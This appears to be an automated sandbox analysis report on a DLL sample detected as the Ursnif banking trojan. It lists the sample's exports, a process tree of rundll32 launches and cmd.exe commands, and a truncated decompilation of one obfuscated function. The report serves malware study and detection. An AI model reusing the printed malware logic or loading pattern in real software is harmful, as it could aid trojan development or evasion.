SHLWAPI.dll	PathFindFileNameA, PathAddBackslashW, PathStripToRootA
DCIMAN32.dll	DCICreatePrimary, DCIOpenProvider, GetDCRegionData, DCISetDestination, DCICloseProvider, DCICreateOverlay, GetWindowRegionData, DCIEndAccess, WinWatchDidStatusChange, DCICreateOffscreen, DCISetSrcDestClip, DCIDestroy, DCIDraw, DCISetClipList, DCIEnum, DCIBeginAccess, WinWatchClose

Exports

Name	Ordinal	Address
Connectdark	1	0x1021c64
Mindlake	2	0x1020de0
Porthigh	3	0x1021c2c
Problemscale	4	0x1021bf8
WingGrass	5	0x1021b0a

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4244 Parent PID: 5576

General

Start time:	02:44:23
Start date:	15/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll'
Imagebase:	0xfa0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1124 Parent PID: 4244

General

Start time:	02:44:24
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2736 Parent PID: 4244

General

Start time:	02:44:24
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Connectdark
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 240 Parent PID: 1124

General

Start time:	02:44:24
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3216 Parent PID: 2736

General

Start time:	02:44:25
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4708 Parent PID: 240

General

Start time:	02:44:25
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1084 Parent PID: 3216

General

Start time:	02:44:25
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6036 Parent PID: 4708

General

Start time:	02:44:25
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6104 Parent PID: 2736

General

Start time:	02:44:26
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5872 Parent PID: 240

General

Start time:	02:44:26
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6116 Parent PID: 6104

General

Start time:	02:44:26
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 256 Parent PID: 5872

General

Start time:	02:44:27
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5780 Parent PID: 4244

General

Start time:	02:44:29
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Mindlake
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4944 Parent PID: 5780

General

Start time:	02:44:29
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5944 Parent PID: 4944

General

Start time:	02:44:30
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5108 Parent PID: 4244

General

Start time:	02:44:32
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Porthigh
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 2172 Parent PID: 5780

General

Start time:	02:44:32
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2168 Parent PID: 2172

General

Start time:	02:44:33
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1536 Parent PID: 5108

General

Start time:	02:44:33
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5840 Parent PID: 1536

General

Start time:	02:44:34
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 1488 Parent PID: 4244

General

Start time:	02:44:37
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Problemscale
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 5252 Parent PID: 1488

General

Start time:	02:44:37
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5280 Parent PID: 5252

General

Start time:	02:44:38
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 3440 Parent PID: 4244

General

Start time:	02:44:42
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,WingGrass
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 5908 Parent PID: 5108

General

Start time:	02:44:42
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4952 Parent PID: 1488

General

Start time:	02:44:43
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6012 Parent PID: 5908

General

Start time:	02:44:43
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4960 Parent PID: 3440

General

Start time:	02:44:43
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4180 Parent PID: 4952

General

Start time:	02:44:44
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5264 Parent PID: 4960

General

Start time:	02:44:44
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4628 Parent PID: 4244

General

Start time:	02:44:45
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3088 Parent PID: 3440

General

Start time:	02:44:51
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2160 Parent PID: 4244

General

Start time:	02:44:51
Start date:	15/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2576 Parent PID: 3088

General

Start time:	02:44:51
Start date:	15/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4244 Parent PID: 5576 loaddll32.exeCOMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.3%
Total number of Nodes:	615
Total number of Limit Nodes:	13

Executed Functions

Function 6E201285, Relevance: 44.3, APIs: 3, Strings: 22, Instructions: 597
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E6E201285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E2200AC(0x6e267e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e2c5a90; // 0xa136430c
				_t127 =  *0x6e2c59d0; // 0xb0fc4cad
				_t261 =  *0x6e2c59d8; // 0x7c6994d4
				_t380 =  *0x6e2c59dc; // 0x5
				_t358 =  *0x6e2c5a00; // 0x9c73d28
				_t405 = 0 - _t380;
				_t327 =  *0x6e2c5a90; // 0xa136430c
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e2c5a58 =  *0x6e2c5a58 + 0xfffffd1c;
					 *0x6e2c5a00 = _t358;
					asm("adc dword [0x6e2c5a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2c59d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2c59dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2c59e6 & 0x0000ffff;
				_t131 = 0x6e2c59e6;
				 *(_t400 - 0x2c) = 0x6e2c59e6;
				 *(_t400 - 0x1c) = 0x6e2c59e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E2201E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2c59d8 = _t261;
						 *0x6e2c59dc = _t380;
						 *0x6e2c5a90 = _t327;
						if(_t327 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e2c5a44);
				_t135 = 6;
				_t411 =  *0x6e2c5a98 - _t135; // 0x6e26e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2c59d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2c59dc = _t380;
				} else {
					_t412 =  *0x6e2c5a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2c59d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e2c5a00; // 0x9c73d28
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2c59e6;
				 *0x6e2c5a90 = _t139 -  *0x6e2c5a90 +  *0x6e2c59d0;
				_t142 =  *0x6e2c59e6 & 0x0000ffff;
				 *0x6e2c59d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2c59dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E2201E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2c59d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2c59dc = _t256;
						 *0x6e2c5a90 = _t381;
						if(_t381 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t381 =  *0x6e2c5a00; // 0x9c73d28
							_t142 =  *0x6e2c59e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e2c5a44);
				 *0x6e2c59d0 = E6E200D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e2c5a04 - 0x1b47; // 0x0
				if(_t417 == 0) {
					_t318 =  *0x6e2c5a90; // 0xa136430c
					_t319 = _t318 + ( *0x6e2c59e6 & 0x0000ffff);
					 *0x6e2c5a90 = _t319;
					_push(0);
					_t320 =  *0x6e2c59d8; // 0x7c6994d4
					asm("adc [0x6e2c59dc], eax");
					 *0x6e2c59d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E200D32();
				_t402 = _t401 - 0x10;
				 *0x6e2c59d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E205DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E204197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e2c5a02 - _t270; // 0x9c7
				if(_t418 == 0) {
					_t151 =  *0x6e2c59d8; // 0x7c6994d4
					_t153 = _t151 + 0x11dde +  *0x6e2c59d0;
					__eflags = _t153;
					 *0x6e2c5a90 = _t153;
				} else {
					_t315 =  *0x6e2c59d8; // 0x7c6994d4
					 *0x6e2c59d0 =  *0x6e2c59d0 +  ~_t315 -  *0x6e2c5a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E24179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2c59d0; // 0xb0fc4cad
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0xb0fc4975
				_t272 = _t25;
				 *0x6e2c5a90 = _t272;
				_t419 =  *0x6e2c5a02 - _t155; // 0x9c7
				if(_t419 == 0) {
					_t331 =  *0x6e2c5a00; // 0x9c73d28
					_t156 = 0;
					 *0x6e2c59dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2c59d8 = _t333;
				} else {
					_t333 =  *0x6e2c59d8; // 0x7c6994d4
					_t156 =  *0x6e2c59dc; // 0x5
					 *0x6e2c5a90 = _t272 - _t333 * 0x3d -  *0x6e2c5a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E204401(_t260, E6E204401(_t260, E6E201FF2(_t260, E6E2020D9(_t260, E6E204267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e2c8150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e2c5a00; // 0x9c73d28
				_t277 = 0x6e2c5a0e;
				_t362 =  *0x6e2c59dc; // 0x5
				_t383 =  *0x6e2c59d8; // 0x7c6994d4
				do {
					if(_t336 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x9c73d2d
						_t245 = _t26 + _t383;
						 *0x6e2c5a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2c59e2);
				_push("cd Matter m");
				 *0x6e2c59d8 = _t383;
				 *0x6e2c59dc = _t362; // executed
				E6E24179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e2c5a98 - _t164; // 0x6e26e664
				if(_t422 != 0) {
					L34:
					 *0x6e2c59d8 =  *0x6e2c59d8 - 0x27 +  *0x6e2c59d0 * 0x3d;
					asm("sbb [0x6e2c59dc], ecx");
				} else {
					_t423 =  *0x6e2c5a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2c59d8; // 0x7c6994d4
						 *0x6e2c59d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e2c5a90 =  *0x6e2c5a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E204197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t169);
				_t281 = 0x27;
				_t171 = E6E200EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2c59d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2c59dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E205DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E204197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
